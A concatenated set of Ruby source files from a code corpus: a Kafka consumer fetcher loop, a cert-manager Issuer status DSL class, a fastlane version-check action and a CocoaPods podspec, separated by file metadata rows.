        cmd, args = @commands.deq

        @logger.debug "Handling fetcher command: #{cmd}"

        send("handle_#{cmd}", *args)
      elsif !@running
        sleep 0.1
      elsif @queue.size < @max_queue_size
        step
      else
        @logger.warn "Reached max fetcher queue size (#{@max_queue_size}), sleeping 1s"
        sleep 1
      end
    end

    def handle_configure(min_bytes, max_bytes, max_wait_time)
      @min_bytes = min_bytes
      @max_bytes = max_bytes
      @max_wait_time = max_wait_time
    end

    # Drops all buffered batches and tracked offsets.
    def handle_reset
      @next_offsets.clear
      @queue.clear
    end

    def handle_stop(*)
      @running = false

      # After stopping, we need to reconfigure the topics and partitions to fetch
      # from. Otherwise we'd keep fetching from a bunch of partitions we may no
      # longer be assigned.
      handle_reset
    end

    def handle_subscribe(topic, max_bytes_per_partition)
      @logger.info "Will fetch at most #{max_bytes_per_partition} bytes at a time per partition from #{topic}"
      @max_bytes_per_partition[topic] = max_bytes_per_partition
    end

    def handle_seek(topic, partition, offset)
      @instrumenter.instrument('seek.consumer',
                               group_id: @group.group_id,
                               topic: topic,
                               partition: partition,
                               offset: offset)
      @logger.info "Seeking #{topic}/#{partition} to offset #{offset}"
      @next_offsets[topic][partition] = offset
    end

    # Fetches one round of batches, records per-batch metrics, advances the
    # next-offset bookkeeping, and hands the batches to the consumer queue.
    # Errors are forwarded through the queue rather than raised so the
    # consumer thread can deal with them.
    def step
      batches = fetch_batches

      batches.each do |batch|
        unless batch.empty?
          @instrumenter.instrument("fetch_batch.consumer", {
            topic: batch.topic,
            partition: batch.partition,
            offset_lag: batch.offset_lag,
            highwater_mark_offset: batch.highwater_mark_offset,
            message_count: batch.messages.count,
          })
        end

        @next_offsets[batch.topic][batch.partition] = batch.last_offset + 1
      end

      @queue << [:batches, batches]
    rescue Kafka::NoPartitionsToFetchFrom
      @logger.warn "No partitions to fetch from, sleeping for 1s"
      sleep 1
    rescue Kafka::Error => e
      @queue << [:exception, e]
    end

    # Builds and executes a FetchOperation covering every tracked
    # topic/partition offset.
    def fetch_batches
      @logger.debug "Fetching batches"

      operation = FetchOperation.new(
        cluster: @cluster,
        logger: @logger,
        min_bytes: @min_bytes,
        max_bytes: @max_bytes,
        max_wait_time: @max_wait_time,
      )

      @next_offsets.each do |topic, partitions|
        # Fetch at most this many bytes from any single partition.
        max_bytes = @max_bytes_per_partition[topic]

        partitions.each do |partition, offset|
          operation.fetch_from_partition(topic, partition, offset: offset, max_bytes: max_bytes)
        end
      end

      operation.execute
    rescue NoPartitionsToFetchFrom
      backoff = @max_wait_time > 0 ? @max_wait_time : 1

      @logger.info "There are no partitions to fetch from, sleeping for #{backoff}s"
      sleep backoff

      []
    end
  end
end
| 25.612565 | 110 | 0.612428 |
878ad4b650cd41de4bd4ba50bccdc4c34f81df58 | 1,385 | # typed: true
module Kuby
  module CertManager
    module DSL
      module CertManager
        module V1
          # DSL wrapper for one entry of a cert-manager v1 Issuer's
          # status.conditions list. Exposes the condition fields as value
          # fields and validates their presence/format before
          # serialization.
          class IssuerStatusConditions < ::KubeDSL::DSLObject
            value_field :status
            value_field :observed_generation
            value_field :last_transition_time
            value_field :reason
            value_field :message
            value_field :type

            validates :status, field: { format: :string }, presence: true
            validates :observed_generation, field: { format: :integer }, presence: true
            validates :last_transition_time, field: { format: :string }, presence: false
            validates :reason, field: { format: :string }, presence: false
            validates :message, field: { format: :string }, presence: false
            validates :type, field: { format: :string }, presence: true

            # Renders the condition as a hash with camelCased keys,
            # mirroring the Kubernetes JSON field names.
            def serialize
              {
                status: status,
                observedGeneration: observed_generation,
                lastTransitionTime: last_transition_time,
                reason: reason,
                message: message,
                type: type
              }
            end

            def kind_sym
              :issuer_status_conditions
            end
          end
        end
      end
    end
  end
end
f7f23dac73b148e70eca59056d27be810a296504 | 741 | module Fastlane
module Actions
module SharedValues
end
class FastlaneVersionAction
def self.run(params)
defined_version = ((Gem::Version.new(params.first) if params.first) rescue nil)
raise "Please pass minimum fastlane version as parameter to fastlane_version".red unless defined_version
if Gem::Version.new(Fastlane::VERSION) < defined_version
raise "The Fastfile requires a fastlane version of >= #{defined_version}. You are on #{Fastlane::VERSION}. Please update using `sudo gem update fastlane`.".red
end
Helper.log.info "fastlane version valid"
end
def self.step_text
"Verifying required fastlane version"
end
end
end
end
| 29.64 | 169 | 0.682861 |
1812573e78acb631686d32c8b4f49dd0a0cb0703 | 719 | Pod::Spec.new do |s|
s.name = "Then"
s.version = "2.7.0"
s.summary = "Super sweet syntactic sugar for Swift initializers."
s.homepage = "https://github.com/tworingsoft/Then"
s.license = { :type => "MIT", :file => "LICENSE" }
s.author = { "Suyeol Jeon" => "[email protected]" }
s.source = { :git => "https://github.com/tworingsoft/Then.git",
:tag => s.version.to_s }
s.source_files = "Sources/Then/*.swift"
s.requires_arc = true
s.swift_version = "5.0"
s.ios.deployment_target = "8.0"
s.osx.deployment_target = "10.9"
s.tvos.deployment_target = "9.0"
s.watchos.deployment_target = "2.0"
end
| 37.842105 | 76 | 0.557719 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.